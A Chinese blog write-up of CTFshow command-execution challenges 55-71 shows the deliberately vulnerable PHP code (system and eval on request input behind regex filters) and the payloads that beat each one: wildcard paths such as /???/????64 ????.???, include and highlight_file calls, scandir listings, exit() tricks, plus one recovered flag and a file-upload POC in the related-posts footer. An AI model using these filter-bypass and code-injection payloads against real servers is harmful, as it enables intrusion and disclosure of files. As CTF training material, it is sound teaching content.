CTFshow命令执行(55-71)

原创 已于 2025-03-26 11:13:09 修改 · 558 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android #网络安全 #安全 #web安全 #前端 #CTF

于 2025-03-26 11:12:33 首次发布

Web55

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 20:03:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
// 你们在炫技吗?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

由于过滤了字母,但没有过滤数字,我们尝试使用/bin目录下的可执行程序。

但因为字母不能传入,我们需要使用通配符?来进行代替

?c=/bin/base64 flag.php

替换后变成

?c=/???/????64 ????.???

极限命令执行1

所有环境均为centos7 根目录getflag文件

<?php
//本题灵感来自研究一直没做出来的某赛某题时想到的姿势,太棒啦~。
//flag在根目录flag里,或者直接运行根目录getflag
​
error_reporting(0);
highlight_file(__FILE__);
​
if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (!preg_match("/[b-zA-Z_@#%^&*:{}\-\+<>\"|`;\[\]]/",$ctfshow)){
            system($ctfshow);
        }else{
            echo("????????");
        }
}
?>

没有过滤a和 / ?

根据centos7的特性可以直接执行文件

/getflag

payload = /?????a?

Web60

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}
​

本关包含了多个方法以及思路进行绕过

Web61

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

show_source('flag.php')

当我们知道了flag.php文件的flag变量名字后也可以使用骚操作:

c=include('flag.php');echo $flag;

Web62

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}
​

同61一样

Web63

骚操作+1 如果不知道命名的情况下

c=include('flag.php');var_dump(get_defined_vars());

Web64

同上

目前已知方法:

  • 文件包含

  • 伪协议

  • 高亮显示,源码读取

  • 输出查看变量

  • 日志包含

Web65

c=highlight_file('flag.php');

Web66

flag.php没有flag,真正flag在根目录。你问我怎么知道的?当然是一点点找的

var_dump(scandir('/'));
​
array(21) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(3) "dev" [5]=> string(3) "etc" [6]=> string(8) "flag.txt" [7]=> string(4) "home" [8]=> string(3) "lib" [9]=> string(5) "media" [10]=> string(3) "mnt" [11]=> string(3) "opt" [12]=> string(4) "proc" [13]=> string(4) "root" [14]=> string(3) "run" [15]=> string(4) "sbin" [16]=> string(3) "srv" [17]=> string(3) "sys" [18]=> string(3) "tmp" [19]=> string(3) "usr" [20]=> string(3) "var" } 
c=highlight_file('/flag.txt');
ctfshow{9c835405-b6cc-49d5-be3f-bb02b8255741}

Web67

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

使用var_dump(scandir("/"));来显示文件夹下的内容

然后使用highlight_file来高亮显示flag

Web68

扫目录,找flag

c=include('/flag.txt'); 没有php标签默认html输出

Web69

var_export(scandir("/"));

c=include('/flag.txt');

Web70

var_export(scandir("/"));

c=include('/flag.txt');

Web71

附件下载,拿到源码

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents(); //得到缓冲区内容
        ob_end_clean();   //将缓冲区清空
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);  //将输出内容进行替换
}else{
    highlight_file(__FILE__);
}
​
?>
​
你要上天吗?

思路:直接不执行后面的代码,exit();

c=var_export(scandir("/"));exit();

c=include('/flag.txt');exit();

Ctfer训练计划】——命令执行的解题技巧(持续更新中)
Demo不是emo的博客
12-31 6649
ctf命令执行题型解题方法汇总(持续更新中)
ctfshowPHP特性
cosmoslin的博客
09-14 2771
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
CTFSHOW-文件包含
Monica的博客
09-12 7263
WEB78 题目: <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 知识点:php伪协议 php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 1、php://input
ctf 命令执行总结
njqfb的博客
06-04 3172
命令执行绕过总结 linux系统查看文件命令 more 一页一页的显示文件内容 less 和more类似 head 只显示头几行 tail 只显示最后几行 nl 显示时还输出行号 tailf cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 od 以二进制的方式读取内容 vi 编辑文件 vim 编辑文件,是vi的升级版 sort 将以默认的方式将文本文件的第一列以ASCI
ctf刷题小结
quan9i的博客
05-15 7018
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
CTFSHOW-WEB入门-命令执行54-70
2301_80024722的博客
02-02 1081
会读取gzip文件并将其内容输出到标准输出设备。如果文件不是gzip格式,readgzfile会直接从文件中读取内容而不进行解压。这些字符 ‘c’、‘a’ 和 ‘t’ 可以以任意顺序出现,并且它们之间可以有任意字符(包括零个字符)分隔。在Linux下可以在当前目录下执行可执行文件或者命令。运算进行解析,由于这道题的。通过查阅资料可以知道,在。在进行按位取反就可以得到。,那么我们只需要拼接出。进行按位取反可以得到。
ctfshow web入门 web29-40 命令执行-1
最新发布
Azure_lyn的博客
08-13 828
本人初学,如有错误欢迎批评指正~
[CTFSHOW]命令执行55-74
Huamang的博客
03-05 1682
web 55 if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } bin目录: bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、
CTFshow web入门 web29-------web56 命令执行wp
2202_75289892的博客
07-30 1100
过滤了flag,可见是文件名过滤,需要查看flag.php 或者flag.txt等文件。此外 读取文件利用cat函数,输出利用system、passthru。3.双引号绕过 fl''ag''.php。2.反斜杠绕过 fl\ag.php。1.通配符绕过 fla?还有特殊变量$1、内联执行等。
ctfshow 命令执行 web 29~124
shinygod的博客
02-22 596
原理:因为localeconv()的第个元素是“.”,然后pos()能够提取出当前元素的值,也就是“.”,而scandir()能过返回指定目录中的文件和目录的数组,然而上一层pos()已经提取出".“,这样就变成scandir(”.")返回当前目录下的目录数组,array_reverse()以相反的元素顺序返回数组,next()提取第二个元素,最后用read_file()、highlight_file()和show_source()读出源码。//若成功,则返回一个数组,若失败,则返回 false。
CTFshow Web入门 命令执行
m0_62905261的博客
05-01 2198
CTFshow Web入门 命令执行
CTFshow-web-web12
qq_68581192的博客
10-20 216
highlight_file()函数可以用于将一个PHP文件的代码高亮显示,并输出到页面上或者保存到文件中。利用burpsuite进行抓包,发现是get传参。glob()函数返回匹配指定模式的文件名或目录。glob(“.txt”)匹配以txt后缀的文件。我们使用高亮函数,将长的文件显示一下。我们将当前目录下的文件打印出,输入。php中有个函数glob();glob(“”)匹配任意文件。尝试远程代码执行,传入参数。查看源代码,发现有个提示。
ctfshow命令执行——突破禁用函数
nidaxin的博客
02-20 866
web58:【突破禁用函数】 代码执行: 利用系统函数实现命令执行,在php下,允许命令执行的函数有: eval():eval() 函数把字符串按照 PHP 代码来计算。 assert() preg_replace():替换字符串 call_user_func():就是一种用于传参的函数 file_get_contents():获取文件内容 scandir() 函数返回一个数组,其中包含指定路径中的文件和目录。若成功,则返回一个数组,若失败,则返回 false。如果directory不是目录..
ctf刷题记录2(完结)
m0_73973498的博客
04-02 3998
因为csdn上内容过多编辑的时候会很卡,因此重开一篇,继续刷题之旅。
ctfshow-php特性系列
qq_45951598的博客
04-10 2565
文章目录WEB89-数组绕过WEB90-intval绕过WEB91-preg_match-换行绕过WEB92-科学计数法EWEb93WEB94WEB95WEB96WEB97-MD5绕过WEB98 WEB89-数组绕过 源码: include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){
CTF中的PHP特性函数(下)
小王的储物间
01-04 895
本文到这就结束了,这篇文章讲了几个比较有趣而且有一些难度的特性知识,不知道大家吸收的咋样了,当然PHP特性远没有这么少,有兴趣的小伙伴可以自行去了解一下。喜欢本文的朋友希望可以一键三连支持一下。
PHP代码审计入门1
lwwzyy
09-03 649
CTF中的PHP代码审计
basectf ez_php_jail (GET请求与点)(highlight_file()模糊匹配glob)
2301_76362117的博客
09-14 371
(cGgwX2luZm9fTGlrZV9qYWlsLnBocA==解码为ph0_info_Like_jail.php)highlight_file()通过glob()函数模糊匹配。当 php 版本⼩于 8 时,GET 请求的参数名含有 . ,会被转为 _ ,但是如果参数名中有 [ ,这。个 [ 会被直接转为 _ ,但是后⾯如果有 . ,这个 . 就不会被转为 _。所以查看ph0_info_Like_jail.php的url为。函数:返回一个包含匹配指定模式的文件名或目录的。找根目录有没有flag。
ctfshow web55
08-24
根据引用和,web55是一个CTF Show的题目,其中包含了一个代码分析和一个文件上传的功能。 在代码分析中,如果存在名为'c'的GET参数,则将其赋值给变量$c。然后通过正则表达式判断$c是否包含了一些特殊的字符,如果不包含,则调用system函数执行$c的值。否则,将会显示当前文件的源代码。 而在文件上传的功能中,首先需要准备一个上传的网页,然后将文件上传到临时文件夹中。临时文件一般位于/tmp/目录下,命名规则为php加5个小写字母加一个可能为大写的字母。可以通过. /???/********[@-]]来访问上传的文件。其中[@-]]是用于匹配大写字母的。可以使用以下脚本进行上传: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>POST数据包POC</title> </head> <body> <form action="http://20a29f30-b869-423a-a6d6-e8cac9b4ca30.challenge.ctf.show/" method="post" enctype="multipart/form-data"> <!--链接是当前打开的题目链接--> <label for="file">文件名:</label> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="提交"> </form> </body> </html> ``` 这样,你就可以通过上传文件来进行操作了。请注意,具体的操作还需要根据题目要求进行相应的尝试和实验。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow web入门55~122 命令执行](https://blog.youkuaiyun.com/qq_53063436/article/details/117386793)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTFshow web55](https://blog.youkuaiyun.com/qq_40345591/article/details/127791317)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值